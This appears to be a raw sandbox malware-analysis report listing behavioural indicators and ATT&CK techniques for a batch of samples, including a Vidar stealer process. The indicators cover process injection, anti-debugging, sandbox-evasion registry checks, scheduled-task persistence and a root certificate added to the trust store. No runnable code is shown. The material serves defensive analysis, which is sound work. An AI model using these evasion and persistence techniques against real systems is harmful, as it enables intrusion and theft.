1272	tasklist.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\Mozilla\\Firefox\\Desktop Background.bmp"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\images\\BG.jpg"	WallpaperX.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
6184	AUTOKEY.exe
3028	chrome_93.exe
6748	updater.exe
5984	random.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 1732 set thread context of 4148	1732	Tutorial.exe	179
PID 6748 set thread context of 5048	6748	updater.exe	467
PID 6748 set thread context of 6996	6748	updater.exe	468
PID 6364 set thread context of 6632	6364	winupsecvmgr.exe	589
PID 6364 set thread context of 7000	6364	winupsecvmgr.exe	595

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x003100000004548f-5054.dat	upx
behavioral1/memory/8148-5059-0x00007FF616930000-0x00007FF617580000-memory.dmp	upx
behavioral1/memory/8148-5065-0x00007FF616930000-0x00007FF617580000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\sysnldcvmr.exe	newtpp.exe
File opened for modification	C:\Windows\sysnldcvmr.exe	newtpp.exe

Launches sc.exe 23 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4648	sc.exe
6816	sc.exe
1456	sc.exe
8688	sc.exe
6752	sc.exe
6336	sc.exe
3676	sc.exe
4740	sc.exe
7092	sc.exe
8748	sc.exe
1072	sc.exe
6604	sc.exe
6852	sc.exe
6448	sc.exe
2784	sc.exe
7616	sc.exe
8100	sc.exe
7136	sc.exe
1052	sc.exe
4328	sc.exe
7952	sc.exe
8268	sc.exe
7224	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 7 IoCs

pid	pid_target	Process	procid_target
6744	6584	WerFault.exe	596
7060	5372	WerFault.exe	642
8472	9096	WerFault.exe	608
7524	9088	WerFault.exe	692
6756	7216	WerFault.exe	609
9016	8468	WerFault.exe	814
7976	3424	WerFault.exe	847

System Location Discovery: System Language Discovery 1 TTPs 28 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	del.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	client32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regbrowsers.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1828110144.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	230830707.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	System32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysnldcvmr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2723718555.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dsd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	newtpp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	handeltest.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	start.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ApertureLab.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	249826912.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Tutorial.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	run.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vidar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AUTOKEY.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 23 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1980	PING.EXE
3016	PING.EXE
1564	PING.EXE
2072	cmd.exe
5584	PING.EXE
6736	PING.EXE
6984	PING.EXE
4368	PING.EXE
4688	PING.EXE
1844	PING.EXE
6424	PING.EXE
6684	PING.EXE
6128	PING.EXE
6612	PING.EXE
2568	PING.EXE
5260	PING.EXE
6824	PING.EXE
3676	PING.EXE
5592	PING.EXE
4216	PING.EXE
1288	PING.EXE
6124	PING.EXE
4468	PING.EXE

NSIS installer 1 IoCs

installer

resource	yara_rule
behavioral1/files/0x001b000000045732-6072.dat	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S	output.exe

Checks processor information in registry 2 TTPs 40 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	output.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	output.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	vidar.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	vidar.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Delays execution with timeout.exe 8 IoCs

evasion

pid	Process
5568	timeout.exe
3836	timeout.exe
5916	timeout.exe
6348	timeout.exe
7852	timeout.exe
4272	timeout.exe
4480	timeout.exe
2660	timeout.exe

Detects videocard installed 1 TTPs 4 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5740	wmic.exe
7348	wmic.exe
8304	wmic.exe
7124	wmic.exe

Enumerates system info in registry 2 TTPs 13 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation	output.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer	output.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName	output.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0	output.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
7600	taskkill.exe
7276	taskkill.exe
5860	taskkill.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	7zFM.exe
Key created	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000_Classes\Local Settings	firefox.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	vidar.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	vidar.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\SysinternalsSuite.zip:Zone.Identifier	firefox.exe

Runs ping.exe 1 TTPs 22 IoCs

Remote System Discovery

T1018

pid	Process
4468	PING.EXE
6684	PING.EXE
4216	PING.EXE
5584	PING.EXE
4688	PING.EXE
1844	PING.EXE
6424	PING.EXE
6824	PING.EXE
3676	PING.EXE
6984	PING.EXE
1564	PING.EXE
5260	PING.EXE
5592	PING.EXE
6612	PING.EXE
6128	PING.EXE
1980	PING.EXE
6124	PING.EXE
6736	PING.EXE
3016	PING.EXE
4368	PING.EXE
1288	PING.EXE
2568	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 32 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5200	schtasks.exe
6920	schtasks.exe
3700	schtasks.exe
2352	schtasks.exe
3360	schtasks.exe
332	schtasks.exe
6976	schtasks.exe
2104	schtasks.exe
5184	schtasks.exe
3480	schtasks.exe
6328	schtasks.exe
3492	schtasks.exe
5044	schtasks.exe
652	schtasks.exe
2004	schtasks.exe
1236	schtasks.exe
4264	schtasks.exe
3508	schtasks.exe
5288	schtasks.exe
6292	schtasks.exe
1580	schtasks.exe
7928	schtasks.exe
1556	schtasks.exe
4984	schtasks.exe
2408	schtasks.exe
6632	schtasks.exe
4244	schtasks.exe
6412	schtasks.exe
5836	schtasks.exe
4048	schtasks.exe
5384	schtasks.exe
9084	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 5 IoCs

pid	Process
2636	7zFM.exe
1428	taskmgr.exe
3260	Autoruns64.exe
2816	procexp64.exe
2000	svchost.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
2816	procexp64.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 24 IoCs

pid	Process
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
5856	msedge.exe
5856	msedge.exe
5856	msedge.exe
5856	msedge.exe
5856	msedge.exe
5856	msedge.exe
5856	msedge.exe
5856	msedge.exe
5856	msedge.exe
5856	msedge.exe
5856	msedge.exe
5856	msedge.exe
6560	msedge.exe
6560	msedge.exe
6560	msedge.exe
6560	msedge.exe
6560	msedge.exe
6560	msedge.exe
6560	msedge.exe
6560	msedge.exe
6560	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	2636	7zFM.exe
Token: 35	2636	7zFM.exe
Token: SeDebugPrivilege	5756	firefox.exe
Token: SeDebugPrivilege	5756	firefox.exe
Token: SeSecurityPrivilege	2636	7zFM.exe
Token: SeDebugPrivilege	1428	taskmgr.exe
Token: SeSystemProfilePrivilege	1428	taskmgr.exe
Token: SeCreateGlobalPrivilege	1428	taskmgr.exe
Token: SeDebugPrivilege	5224	firefox.exe
Token: SeDebugPrivilege	5224	firefox.exe
Token: SeDebugPrivilege	5224	firefox.exe
Token: SeRestorePrivilege	3260	Autoruns64.exe
Token: SeDebugPrivilege	2816	procexp64.exe
Token: SeBackupPrivilege	2816	procexp64.exe
Token: SeSecurityPrivilege	2816	procexp64.exe
Token: SeLoadDriverPrivilege	2816	procexp64.exe
Token: SeShutdownPrivilege	2816	procexp64.exe
Token: SeCreatePagefilePrivilege	2816	procexp64.exe
Token: SeShutdownPrivilege	2816	procexp64.exe
Token: SeCreatePagefilePrivilege	2816	procexp64.exe
Token: SeDebugPrivilege	2816	procexp64.exe
Token: SeImpersonatePrivilege	2816	procexp64.exe
Token: SeSecurityPrivilege	2816	procexp64.exe
Token: SeDebugPrivilege	2816	procexp64.exe
Token: SeBackupPrivilege	2816	procexp64.exe
Token: SeRestorePrivilege	2816	procexp64.exe
Token: SeDebugPrivilege	2816	procexp64.exe
Token: 33	1428	taskmgr.exe
Token: SeIncBasePriorityPrivilege	1428	taskmgr.exe
Token: SeDebugPrivilege	5852	New Text Document mod.exe
Token: SeDebugPrivilege	5772	SGVP%20Client%20Users.exe
Token: SeDebugPrivilege	4428	Registry.exe
